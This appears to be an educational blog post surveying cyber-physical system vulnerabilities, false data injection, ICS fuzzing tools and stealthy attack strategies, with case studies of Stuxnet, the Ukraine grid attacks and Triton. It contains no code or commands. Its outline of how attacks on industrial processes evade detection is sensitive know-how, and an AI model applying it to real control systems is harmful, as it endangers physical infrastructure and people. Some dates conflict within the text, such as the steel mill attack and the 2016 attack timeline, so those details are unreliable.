Introduction to Cyber Physical System Vulnerabilities

 
 

In Part 8 of this new Cyber Physical Systems series, I will introduce the different types of vulnerabilities that these systems have and why they are so vulnerable.


CPS Vulnerabilities

A vulnerability is identified as a security gap that can be exploited. Hence, vulnerability assessments consist of identification and analysis of the available CPS weaknesses, while also identifying appropriate corrective and preventative actions to reduce, mitigate or even eliminate them.

Vulnerabilities occur due to many reasons. Some of the important ones are:

  • Isolation assumption (aka "security by obscurity")

  • Increased connectivity

  • Heterogeneity

  • USB usage - how Stuxnet jumped the air gap and targeted Iranian power plants

  • Bad practices - bad coding, weak skills, misconfiguration

  • Spying - long term recon going unnoticed. Steal and gather sensitive/confidential data and analyse system behaviours.

  • Homogeneity - similiar CPS types suffer from same vulnerabilities and once exploited can effect all the similiar devices

  • Suspicious employees - sabotage, modifying code, granting remote access, etc..

CPS vulnerabilities can be of different types such as cyber, physical, and when combined result into resulting in cyber-physical threats, technical, network, platform and management.

Cyber Vulnerabilities

ICSs rely heavily on ICCP and TCP/IP for inter-control center communication. The Inter-control Center Communications Protocol (ICCP) was developed to enable data exchange over Wide Area Networks between utility control centers, Independent System Operators (ISOs), Regional Transmission Operators (RTOs) and other generators.

ICCP suffers from buffer overflow and lacks security measures (Secure-ICCP, ICCP over TLS). Stuxnet, DuQu, Gauss, Red October, Shamoon (Aramco oil company), Mahdi, Slammer (scanning internet) are just some examples.

Open and non-secure wired/wireless communication (Ethernet) are vulnerable to interception, sniffing, eavesdropping, wire tapping, wardialing, wardriving, meet-in-the-middle attack (breaking sequential encryption like Double-DES) and SQL injection.

Modbus and DNP3 monitor and send contorl commands to perception layer have no security measures. False data injection, battery draining attacks and many other vulnerabilities. DNP3 has CRC which provides some integrity.

CAN (Controller Area Network) suffers from many vulnerabilities leaving the smart cars prone to attacks such as DoS.

Physical Vulnerabilities

Physical is classified as a vulnerability due to the insufficient physical security provided to the components. Things like being vulnerable to tampering, alteration, modification or even sabotage.

Amongst the physical layer are also medical devices which are vulnerable to physical acces and even modifying their configuration and risk patient health.

The best way to address these vulnerabilities is detection and prevention.

Threats on CPS can be categorized into:

Technical

These commonly occur due to a lack of human/personnel awareness and skills.

Platform

Vulnerabilities in configuration, hardware, software and lack of protection.

Management

These vulnerabilities are mainly due to the lack of security policies, standard and vulnerability management systems.


False Data Injection

A special class of attacks on control systems is false data injection (FDI) attacks. These data integrity attacks, sensor measurements or actuation commands, are being corrupted by a cyber attacker to cause physical impact.

False data injection targets actuators or sensors in feedback control systems. They can cause significant physical damage.

Security mechanisms with focus on the control system. However, this does not eliminate the need for traditional security technologies, such as encryption or authentication, but should rather complement them if they are not able to mitigate attacks at a lower layer.

Assuming that the system under attack is in equilibrium, when the attack starts, it will cause perturbation (disturbance). Hence, it might be detectable to the operator. However, carefully crafted attacks can still mask themselves as natural disturbance.

From an operator POV, breaking the equilibrium is considered an anomaly. It will especially be more suspicious when the perturbation is large and of sufficient duration.

FDI targets the sensors and actuators which will have a physical and tangible impact , therefore compromising the stealthiness of an attacker. Stealthiness is measured by the scale and duration of the perturbation it causes.

Crafted attacks such as coordinated (coordinated sensor) attacks can minimize the perturbation and therefore keep the attacker stealthy.

In recent years, coordinated cyber-physical attacks have caused blackouts of the power grid and disrupted power systems. The main reason is that coordinated attacks on the power grid by hackers was not detected in time, and effective measures to prevent major accidents could not be implemented at the optimum time.

Successful attacks on the information collected from sensors in a feedback control system can have more damaging consequences, compared to open-loop systems. This is due to the active property of closed-loop control systems, where the data collected from sensors are used to decide the next actions to be taken.


Fuzzing

Fuzz testing (fuzzing) is an automated software testing method that injects invalid, malformed, or unexpected inputs into a system to reveal software defects and vulnerabilities. A fuzzing tool injects these inputs into the system and then monitors for exceptions such as crashes or information leakage.

Fuzzing is often used to test for vulnerabilities. However, can also be used to create attacks and exploits by taking down the ICS components.

There are several fuzzing tools, however, some of the tools in the realm of ICS are:

  • beSTORM (not free)

  • Sulley - Not well maintained

  • SMOD (Python2 based) - old and abandoned

  • Modbus-cli (free C/C++ based)

Some other tools, such as Mu-8000 and Achilles require dedicated hardware and software. Such hardware based tools are often capable of fuzz testing beyond the network and protocols. For instance, they would be able to test the field equipment hardware such as valves, actuators, PLC and other controlling unities.

Such solutions are not free or open source. For instance, Achilles has its own certification program in addition to fuzz testing hardware and software.


Covert/Stealthy Attacks

A fundamental problem in intrusion detection is the existence of adaptive adversaries that will attempt to evade the detection scheme; therefore, we now consider an adversary that knows about our anomaly detection scheme.

The goal of the attacker is to raise the pressure in the tank without being detected (raise the pressure while impersonating that the system is working fine or adjusting them such that they are within some thresholds, so they go undetected).

Stale data injection attacks could bypass detection systems as they use plausible and expected data (they are similiar to FDI).

Stealthy FDI attacks are divided into 3 groups:

  1. Surge attacks - modify the system to achieve maximum damage as soon as they get access to the system. These type of attacks are not covert as they result in a huge perturbation in the system.

  2. Bias attacks - modify the system discretely by adding small perturbations that go undetected, however, these are prolonged attacks and over time, they can shorten the lifespan of components and inflict damage (Stuxnet).

  3. Geometric attacks - shift the behaviour of the system very discretely at the beginning of the attack and then maximize the damage after the system has been moved to a more vulnerable state. In other words, it starts with a bias attack and then transforms into a surge attack when the system is the most vulnerable, hence reducing the opportunity of neutralizing the attack.


Case Studies

Stuxnet, the first known computer worm designed to harm a physical process, sabotaged centrifuges at uranium enrichment plant in Iran. The attack deceived the operators, making them believe that the process was operating normally while at the same time sabotaging the enrichment of uranium.

4 years later, a similiar attack disrupted control system of a Germany steel mill by preventing the blast furnace to shutdown, causing massive damage. It was uncovered in 2010.

Stuxnet initially spread with USB flash drive into the targeted facilities. It does little harm to computers and networks that do not meet specific configuration requirements and it is inert - it only activates if it sense Siemens software indicating that there are PLCs and it is in an environment with ICSs.

Yet, it didn't even target all the ICSs, as it was specifically targeted to harm very specific ICS motors.

The entirety of the Stuxnet code has not yet been disclosed, but its payload targets only those SCADA configurations that meet criteria that it is programmed to identify. Stuxnet monitored the ICS to find motors in the system (motors used in the centrifuges).

It monitors the rotational speed of the motors to make sure it is a nuclear plant. If it meets all of these conditions, then it installs a malware to the PLC that occasionally manipulates the rotational speed from ~1000Hz and boosts the rotation to 1400 for about 15 minutes.

Then, it slows down to 2Hz for about 50 minutes. This speed is fatal for the centrifuge rotating parts as they make contact and wear quickly. This small change was enough to, overtime, slow down the enrichment (30%) and strain the centrifuges and damaged 1000 of them.

In 2015, the first confirmed attack on a power grid was launched on the electricity system of Ukraine. It resulted in power outages for 1-6 hours. The attack took place during the ongoing Russo-Ukrainian War (2014-present) and is attributed to a Russian APT known as "Sandworm".

Attackers used the operator's workstations to open breakers and interrupt the power flow of around 60 substations. They also overwrote the firmware of control devices, leaving them unresponsive to remote commands.

On top of that the attack was designed to delay the report of incidents and to impede remote actions of operators.

Later, in 2016 after Stuxnet was uncovered, another attack was launched that took a slightly similiar approach to Stuxnet, with a more sophisticated strategy to mainly target ICSs.

The Ukraine case is very complicated and there are several vulnerabilities involved (physical, cyber, management, political, etc..):

  • Old and dilapidated infrastructure

  • High level of corruption

  • Ongoing geopolitical conflict

  • Possible Russian infiltration

  • Ukraine power grid built by Soviet Union and upgraded with Russian parts

  • Attackers' knowledge of the software and infrastructure

  • Timing of the attack (during holidays) hence a lack of crew and operators

The attack details of the Ukraine case study is roughly:

  • Spear-phishing emails with BlackEnergy malware compromised the network

  • Seizing SCADA under control, remotely switching substations off

  • Disabling/destroying IT/OT infrastructure components (UPSs, modems, RTUs, commutators)

  • Destruction of files stored on servers and workstations with the KillDisk malware

  • DoS attack on call-center to stop consumers up-to-date information on the blackout

  • Switch off emergency power at the utility company's operation center

Finally, discovered in 2017 at a Saudi Arabian petrochemical plant was Triton Malware. FireEye stated this malware was likely crafted by CNIHM in Russia. The malware disabled the safety instruments and systems. This could have caused a disaster in the plant, hence called the "world most murderous malware".

Previous
Previous

Introduction to Securing Cyber Physical Systems

Next
Next

Introduction to Attacks on Cyber Physical Systems